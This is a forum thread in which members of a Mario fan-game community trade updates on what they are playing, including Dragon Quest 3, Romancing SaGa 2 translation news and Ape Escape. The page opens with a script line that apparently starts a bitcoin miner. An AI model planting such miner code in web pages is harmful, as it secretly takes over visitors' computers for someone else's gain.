<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralsmbx communitymario fan games galaxy

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Saturn Moriya

Re: What games are you playing?

Postby Saturn Moriya » 5 years ago

Had to FAQ a thing for Dragon Quest 3. This has happened once or twice in DQ 1 and 2 as well, and I really wish it didn't. Turns out that one of the six orbs requires you to "wait" (walk around a bunch) until the town you helped create grows all the way. I might have come to this by myself eventually, but it would've taken hours of searching everywhere else, because leaving the dealer at the town is one of the last things I did.

So sad! I was so close to beating a DQ game without help. Also, why isn't there a orange orb? I was planning to make a rainbow :c

Your blood their blood serves the same!!

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 5 years ago

I wasn't able to do the Mermaid quest because I activated the Haunted Ship quest by accident by getting Hiraga to build the Leon Bridge.

WOOPS

But I did the Haunted Ship quest and beat Bokuohn as well!
Rapid Stream (the Privateer's formation) is broken as all hell, it made Bokuohn's special attack, Marionette (if he casts it on a character, any party member who attacks next, attacks said character) useless.

Bokuohn was easy as fuck. It helped that he was on his first form.

I'm saving Subier for later, since he's really easy as well (outside of Maelstrom).
No, I didn't fight the Master of Ocean, don't worry.

'Sides, I'm pretty sure Roy Angrym'n would kick my ass too, alongside Subier!
(Master of Ocean is practically a speaking narwhal)
twitter (spicy at times!) | avatar by kuma

who cares:

YelseyKing
Anyone want a banana? :3
First name: Matt

Postby YelseyKing » 5 years ago

KobaBeach wrote:Romancing SaGa 2!
You're really making me wish that Romancing SaGa 2 would get fan translated. Bastard hard though it may be, I've always wanted to try that game, because it actually sounds quite fun.
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

pholtos
Loves adorable things.

Postby pholtos » 5 years ago

I've made it to what appears to be the final world of ape escape given how the plot has progressed. I've super enjoyed this game and is definitely in the top 5 in games I've played in ps1... which are like 5 games.

(Speaking of which I need to play Alundra again one of these days...)
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.

Currently playing:

The 500 char limit is evil. :P

KobaBeach
obscure jrpg enthusiast

YelseyKing wrote:You're really making me wish that Romancing SaGa 2 would get fan translated. Bastard hard though it may be, I've always wanted to try that game, because it actually sounds quite fun.
Thankfully Gideon Zhi seems to actually be working on the title instead of simply dropping it silently, like I've heard Aeon Genesis tends to do.

Maybe it'll get a release in the near future (same with SMT If..., I am sure that there are a ton of peeps here who want that game too).

He did do a stream a while ago where he fixed a text error thing in a menu screen in Majin Tensei (can't remember what, but it's in his twitter). He asked people to vote on whether he would stream him fixing that, or patching up the name entry screen in RS2.

He also did show a pic of an early cutscene translated sometime ago.

He seems to have already inserted the font and translated the script, now it should be inserting the text, then testing and fixing stuff up. (the placeholder pic in the site with the Mana Sword RS3 patch font is very outdated, he has a better font now)

The Romancing SaGa trilogy is a huge mess of spaghetti code from what I heard, altering the cutscene text can break certain things, like tech sparking, event triggering, and so on.

I mean if the Ys V translation came out last year (and that one's been in development since 2011) maybe this one will come out too. Same with If.

Just gotta keep being positive and expect the best!!!

(sometimes I can be a huge pollyanna, sometimes I'm just depressed and expecting the worst, I'm so weird)

You may say I'm a fool~♪
Feeling the way that I do~♫
You can call me Pollyanna, say I'm crazy as a loon~♪
I believe in silver linings and that's why I believe in you~♫♥

(damn I gotta play through the MOTHER series sometime)

who cares:

metasomnia?
the calm before the storm
First name: Meta
Pronouns: he/him/his

Postby metasomnia? » 5 years ago

KobaBeach wrote:(damn I gotta play through the MOTHER series sometime)
Please.

YelseyKing

Just finished (and 100%'d) SMB3Mix. I've pretty much covered everything in my last couple posts, so I'll just say that the postgame was honestly more fun than I thought it'd be.

The final stage wasn't super impressive, but

a Megaman-style boss refight sequence

was entertaining, then the true final boss, who I was disappointed to discover was not actually Foroze, but was in fact

Count Bleck

. Dang. My hopes and dreams, dashed!

But I digress. Overall, pretty fun game, though there's plenty of room for improvement.
Last edited by YelseyKing on 22 Jun 2014, 05:07, edited 1 time in total.

Moists:

Zygl

Postby Zygl » 5 years ago

YelseyKing wrote:Just finished (and 100%'d) SMB3Mix. I've pretty much covered everything in my last couple posts, so I'll just say that the postgame was honestly more fun than I thought it'd be.

[spoilers]

was entertaining, then the true final boss, who I was disappointed to discover

[more spoilers]

But I digress. Overall, pretty fun game, though there's plenty of room for improvement.
Way to ruin the ending of a game I didn't actually intend to play at any point!
ImageImage
ImageImage
ImageImage
ImageImage

YelseyKing

Zyglrox Odyssey wrote:
YelseyKing wrote:Just finished (and 100%'d) SMB3Mix. I've pretty much covered everything in my last couple posts, so I'll just say that the postgame was honestly more fun than I thought it'd be.

[spoilers]

was entertaining, then the true final boss, who I was disappointed to discover

[more spoilers]

Way to ruin the ending of a game I didn't actually intend to play at any point!
Heh. Didn't think spoilers for a ROM hack would be a big deal. I'll censor those. Sorry about that.

Moists:

pholtos
Loves adorable things.

So I just beat up the final boss of ape escape. Hardest thing in the entire game was that

roller coaster ride in the last level

because of draw distances causing me to have little time to react to things that hit the thing I was riding on.

Going to 100% this before moving on, but man that last level was LONG!
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

Currently playing:

Saturn Moriya

KobaBeach wrote:Words regarding SNES rpg translations and Mother 1 vocal soundtracks
That all sounds kinda hopeful actually.

And yes you do, the Mother series has more charm than...things that have alot of charm.

Need to do a bit of grinding for DQ3 final boss, because it keeps 1-hit KO-ing me. At least Metabbles are super common in the final area, so it shouldn't take that long.
Last edited by Saturn Moriya on 22 Jun 2014, 09:23, edited 1 time in total.

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 5 years ago

i just want the GBA rocket slime translated :[
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Sorel
In the shadows
First name: Alexander

Postby Sorel » 5 years ago

Daym the online mode in Mario Kart 8 sure is addicting. Maybe it's because I almost always rank #1.

Rockythechao
the figure of Kevka's bear was a sightseeing
First name: Michael
Pronouns: he/they

Postby Rockythechao » 5 years ago

Leet wrote:i just want the GBA rocket slime translated :[
There's also a 3DS one that never made it stateside :(
Actually, now that I think about it, we never got Dragon Quest X, did we?
A2XT Episode 2's vice admiral "The Project's Not Dead Yet" person and certified Absurdly-Oblivious Fool

Useful posts, discussions & resources for SMBX and A2XT

My art & audio thread
Audiomack (new music), SoundCloud (old music)

𝐀𝐍 𝐀𝐖𝐄𝐒𝐎𝐌𝐄 𝐏𝐑𝐀𝐘𝐄𝐑 𝐈𝐒
𝐂𝐎𝐍𝐅𝐋𝐈𝐂𝐓 𝐖𝐈𝐓𝐇 𝐔𝐒

- 𝐁𝐀𝐓𝐓𝐋𝐄𝐒𝐔𝐈𝐓 𝐌𝐎𝐑𝐒𝐄𝐋 -

𝐊𝐄𝐄𝐏 𝐘𝐎𝐔𝐑 𝐃𝐈𝐆𝐍𝐈𝐓𝐘

Bean

Postby Bean » 5 years ago

Not yet, and we haven't gotten Dragon Quest VII yet either in spite of Bravely Default doing well here, although that might be more Nintendo's doing since they published it. I don't really think Square knows what they're doing at the moment.

One race to go in Road Rash. If I finish in the top four, I've beaten the game. If not, I've got a long way to go before I can upgrade for the final bike to make it easier. As for Mario Kart 8, I've done all the 100cc races.

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 5 years ago

mega man 5

wily skull is pissing me off but i know i can do it its just annoying cause theres so much opportunity for error

e: dragon quest talk: yeah its pretty much vanished over here. except for a mobile VIII port for some reason
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

KobaBeach
obscure jrpg enthusiast

Saved Komulune Island from the volcano's eruption (I won't get dark magic, but I don't mind) and saved a small boy and a baby Moo (they're kinda like yaks) from Dantarg.

Another Hero down, woo~
Leet wrote:mega man 5

wily skull is pissing me off but i know i can do it its just annoying cause theres so much opportunity for error
Good luck!

who cares:

Euparkeria
Palaeontological Platformerer

Postby Euparkeria » 5 years ago

Leet wrote:mega man 5

Skulls don't like archers

Umm am I supposed to take 4 damage from Met shots in Mega Man Rock Force on normal?
Cool banner by Neutron Star!

YelseyKing

Taking a break from platformers and going back to my RPG roots, I decided to give Lost Odyssey a try. I actually tried it a while back, but my old TV rendered the text unreadably tiny, rendering the game unplayable. But with my new TV, I gave it another shot, and wooo, it works great. Haven't played much yet, but I'm getting some good vibes from it. Feels like "Final Fantasy meets Radiant Historia meets Shadow Hearts" thus far. Looking forward to seeing how this game plays out.

I got a rechargeable 360 wireless controller battery pack for Christmas, and *finally* got around to trying it, but I'm... not sure how to use it, and it didn't come with any instructions. I can only assume it's not charged, but I have no idea how *to* charge it, either. Fortunately I have a wired 360 controller I've been using for PC gaming, so I used that, and can continue to do so if needed.

Moists:

pholtos
Loves adorable things.

Ape Escape time attack is pretty dang intense. I've done like the first 2 to gold and up to like the 4th level 100%-wise so far.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

Currently playing:

Ashan
The world has become a place

Postby Ashan » 5 years ago

Just finished inFamous. It was a pretty good game and you should check it out!
Final boss was kinda lame. Finished it on my first try, and I mean... That's not to say it was super easy, but most of the "difficulty" came from the fact that his health bar is stupidly huge and goes down really slow so it's really a test of endurance.

I did the evil version of the game, and I'm curious as to what the good version is like, but I'm too lazy to redo it so I'm gonna move onto a different game for now. Good/evil things are kinda lame, cause it's really just an excuse for you to be forced to play a game twice through to experience everything. Whatever though.

Also, I checked the clock the minute I beat the final boss and it was 12:02AM so I guess I'll have to put on my games beaten list that I beat the game on the 23rd even though that's just barely the case.

Saturn Moriya

Dragon Quest 3 is doneded. Holy crap that final segment was amazing.
They did Alefgard SO well with the music and the going around and the memories and all of the everything.
And holy crap that final boss was intense. All my MP was gone and I was about to be dying and then I won.

Now I'm gonna concentrate on Okami because that game exists too.

Bean

Postby Bean » 5 years ago

Mario Kart 8 again. That was a close one!

SAJewers
hi

Postby SAJewers » 5 years ago

Found out yesterday that Sonic & Knuckles Collection is up on archive.org. Kinda bummed now that I got rid of the copy I had years ago.
ImageImageImageImageImage
ImageImageImageImage

pholtos
Loves adorable things.

I intend to complete ape escape over time, slowly completing a stage at a time. Meanwhile I rolled Castlevania: Aria of Sorrow.... which I know nothing about. So yeah.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

Currently playing:

Return to “the cartridgé”